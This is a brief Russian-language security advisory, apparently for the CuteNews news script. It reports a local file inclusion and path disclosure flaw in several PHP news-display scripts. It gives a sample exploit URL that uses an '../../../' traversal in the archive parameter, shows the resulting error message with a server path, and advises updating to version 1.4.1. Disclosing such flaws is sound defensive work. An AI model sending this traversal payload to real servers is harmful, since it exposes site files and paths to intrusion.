Тип уязвимости: Удаленная
Описание:
Недостаточная фильтрация данных в скриптах: news.php,index.php,index2.php,mainheadline.php (скрипты выводящие новости из архива)
В результате эксплуатации возможен инклюдинг файлов (локально) или раскрытие установочного пути.
Эксплоит:
http://victim.com/index.php?subaction=showfull
&id=1128227686&archive=../../../&start_from=&ucat=1&
Пример сообщения об ошибке:
Warning: file(/home/2/d/dragvollportalen/www/cute/data/archives/../../../.news.arch): failed to open stream: No such file or directory in /home/2/d/dragvollportalen/www/cute/inc/shows.inc.php on line 583
Решение: Обновитесь до версии 1.4.1